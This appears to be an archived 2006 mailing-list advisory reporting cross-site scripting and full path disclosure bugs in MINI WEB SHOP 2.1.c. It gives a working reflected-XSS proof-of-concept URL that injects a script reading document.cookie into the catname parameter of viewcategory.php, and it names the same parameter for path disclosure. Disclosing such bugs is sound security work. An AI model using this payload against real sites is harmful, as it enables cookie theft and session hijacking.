Multiple Bugs in MINI WEB SHOP

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Multiple Bugs in MINI WEB SHOP

Subject: Multiple Bugs in MINI WEB SHOP
Date: 19 Dec 2006 22:01:49 -0000
From: suppressed

Hello 
Vulnerable : MINI WEB SHOP
Version: 2.1.c
web : http://ObieWebsite.SourceForge.net

I Found some bugs ( XSS & Full Path  Disclosure ) in MINI WEB SHOP

XSS :
http://example.com/miniwebshop/modules/viewcategory.php?catname='><script>alert(document.cookie)</script>

Full Path  Disclosure :
http://example.com/miniwebshop/modules/viewcategory.php?catname=[anything]

Discovery by Linux_Drox ( Qptan )
suppressed
www.LeZr.Com/vb

Best Regards ,,,

Prev by Date: Oracle <= 9i / 10g File System Access via utl_file Exploit
Next by Date: MkPortal Urlobox Cross Site Request Forgery
Previous by thread: Oracle <= 9i / 10g File System Access via utl_file Exploit
Next by thread: MkPortal Urlobox Cross Site Request Forgery
Index(es):
- Date
- Thread

Mail converted by mhonarc 2.6.15
This archive provided courtesy of JSW4.NET, Internet Hosting Services for Small Business.